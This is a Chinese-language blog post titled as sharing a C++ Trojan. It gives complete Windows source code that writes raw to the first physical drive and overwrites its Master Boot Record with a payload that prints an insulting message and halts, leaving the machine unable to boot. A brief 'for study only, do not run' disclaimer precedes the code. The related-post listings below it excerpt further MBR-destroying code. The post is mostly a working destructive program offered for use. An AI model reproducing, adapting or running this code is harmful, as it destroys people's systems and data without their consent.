分享C++特洛伊木马

最新推荐文章于 2025-12-18 16:26:22 发布
原创 最新推荐文章于 2025-12-18 16:26:22 发布 · 206 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c++ #单片机 #stm32

文章描述了一个使用C++编写的示例,展示了如何通过`DeviceIoControl`函数在Windows环境下将病毒代码注入到硬盘的主引导记录(MBR)中,强调了代码仅供学习,实际操作需谨慎。

代码只供学习,不能运行,运行后后果自负!

#include <windows.h>
#include <winioctl.h>
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

int WINAPI WinMain(
  HINSTANCE hInstance,  // handle to current instance
  HINSTANCE hPrevInstance,  // handle to previous instance
  LPSTR lpCmdLine,      // pointer to command line
int nCmdShow          // show state of window
)
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
hDevice = CreateFile
(
"\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
return 0;
}

白羊座1
关注
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-18 1077
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
【MBR病毒】实现与解决方案
tiantian520_tt——Python程序猿~
05-02 4692
复现 环境 Attacker OS: Windows 10 1909 X64 IDE: Dev-C++ 5.11 Filename: MBR.cpp Out Filename: MBR.exe Player OS: Windows XP SP2 Filename: MBR.exe 步骤 0.0.1 编译及拷贝 将以下代码输入进Dev-C++: #include<Windows.h> #include<stdio.h> #include<iostream> using na
C++改MBR病毒2.0(经过编译)
yeq2012的博客
04-22 1031
这个程序会覆盖磁盘扇区,一定要非常小心!!!
VBS蠕虫代码,慎用!后果与本人无关!
vliu612的博客
07-03 1183
大家好,今天给大家分享一个vbs蠕虫代码,是我对上一期的进阶 ,想看上一期的搜索vbs冒烟代码。对了,这个代码没有解药,请勿在实体机上运行!废话不多说,直接上代码!
破坏MBR的代码
小驹的专栏
05-20 3672
破坏MBR的代码,只有破坏作用,使系统无法进入。。。 来源于网上。。 #include #include //shellcode随便写了点 能破坏MBR,无法进入系统 unsigned char scode[]= "\xb8\x12\x00" "\xcd\x10\xbd" "\x18\x7c\xb9"; DWORD writeMBR() { DWORD dwBy
MBR蠕虫病毒,慎用!!
vliu612的博客
07-22 465
要运行该C++程序的话。需要把他编译成exe!需要放到D://Backup,我并不建议这么做,因为会传染!如果要在虚拟机上运行的话,需要断网!不然会传染到别的电脑上。但凡使用,后果自负!
Python特洛伊木马病毒程序设计(加强版)(一)
qq_36901667的博客
08-26 1415
Python特洛伊木马病毒程序设计,前言
安全加固:C++ Redistributable在提升系统安全中的关键角色
C++ Redistributable,作为一套重要的组件,为Windows操作系统上运行C++应用程序提供了必要的支持。在本章中,我们将探讨C++ Redistributable如何成为系统安全不可或缺的基础部分。 ## 系统安全基础与C++ ...
【系统规划与管理师读书笔记】第二章 信息技术知识
weixin_42520723的博客
07-01 1461
系统规划与管理师 信息技术知识
病毒木马查杀实战第024篇:MBR病毒之编程解析引导区
Gleam的专栏
04-18 5958
前言        通过之前的学习,相信大家已经对磁盘的引导区有了充分的认识。但是我们之前的学习都是利用现成的工具来对引导区进行解析的,而对于一名反病毒工程师而言,不单单需要有扎实的逆向分析功底,同时也需要有很强的编程能力来解决实际问题。对于我们本次的课程来说,就需要大家亲自动手,利用程序来实现引导区的解析。这样做的目的,一方面是为了提高大家的编程能力,而另一方面则有助于我们更好地理解引导区
C++木马破坏MBR病毒
ZuoJiaWuKong的博客
07-23 9489
一分钟了解如何编写一个C++强力的木马病毒,可不要去干坏事哦!
MBR病毒
plucode的专栏
10-14 1914
好久没有治疗电脑了。前天发生的事情,今儿一起分享一下。MBR病毒。 一朋友拿来一笔记本电脑,说是系统开机自检硬盘,要取消掉。确实是,开机就自检硬盘。于是乎,进入bios把它禁用了。但是,问题就来了,重启之后,马上就蓝屏了。还原默认bios设置,一样。还是蓝屏。奇怪乎!!! 于是乎,进入安全模式。悠嘻,不会蓝屏!!! 分区有问题?因为试过【内存条,硬盘,拆掉换掉都不会有问题的。】 只能默默地把
MBR 病毒
LYSM
02-26 2329
背景 MBR全称主引导记录(Master Boot Record),整个硬盘最开头的512字节就是它。 计算机启动后会先运行MBR里的代码进行各种状态的检查和初始化的工作,然后再把控制权转交给操作系统(简单地讲就是一个JMP指令跳到操作系统的起始代码),Windows就加载启动了。 MBR 病毒做的事就是直接把整个MBR覆盖掉,变成了它自己的代码,那么它想干什么都行了,只要它不主动交出代码执行流程,Windows绝没有启动的机会。 代码 此代码来自:https://www.cnblogs.com/xio
MBR 病毒分析
Y_KolaFish_Y的博客
04-10 2991
转载自https://bbs.pediy.com/thread-121861.htm Author:Cryin MBR病毒分析 一、基础知识 1、 Windows启动过程 系统引导过程主要由以下几个步骤组成(以硬盘启动为例) 1、 开机; 2、 BIOS加电自检(POST—Power On Self Test),内存地址为0fff:0000; 3、 将硬盘第一个扇区(0头0道1扇区,也就是Boot...
分享一病毒源代码,破坏MBR,危险!!仅供学习参考,勿运行(vc++2010已编译通过)
热门推荐
杨航的专栏
04-28 1万+
我在编译的时候,杀毒软件提示病毒并将其拦截,所以会导致编译不成功。 1>D:\c++工程\windows\windows\MBR病毒.cpp : fatal error C1083: 无法打开编译器中间文件:“C:\Users\lenovo\AppData\Local\Temp\_CL_953b34fein”: Permission denied 1> 1>生成失败。 杀毒软件提示: 检
又一个改写MBR的病毒(TDSS TDL4)
08-28 634
此毒为TDSS TDL4 的又一个变种。RIS2011 目前尚未收录此毒。此毒的主要行为是改写MBR,并在硬盘尾部的190个扇区内写入病毒代码。病毒的上述动作可穿透还原类软件对系统的保护。我在Acronis True Image 2010的 Try&Decide模式保护下运行此样本,Acronis True Image 2010的 Try&Decide 保护...
QtWeatherApp - 简单天气预报软件(C++ Qt6)(附源码)
最新发布
sweetikelike的博客
12-18 572
摘要:QtWeatherApp 是一个基于 Qt 6 和 C++ 开发的桌面天气预报应用。该软件通过 OpenWeatherMap Geocoding API 获取城市经纬度,再调用 Open-Meteo 免费天气 API 查询当前天气和7天预报。核心功能包括:支持中英文城市查询、显示温度及天气描述、纯 C++ 实现 Qt 网络请求和 JSON 解析。项目采用模块化设计,包含网络请求、数据处理和 UI 交互组件,可作为学习 Qt 开发的参考案例。软件跨平台支持 Windows/macOS/Linux,源码已
C++经典小游戏源代码分享
关于“压缩包子文件的文件名称列表”中提到的“51CTO下载-1用C++实现的经典小游戏源代码”,这表明该文件可能被上传到了51CTO这样一个IT资源分享平台供用户下载。文件名称中的“1”可能表示这是一个系列中的第一个...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值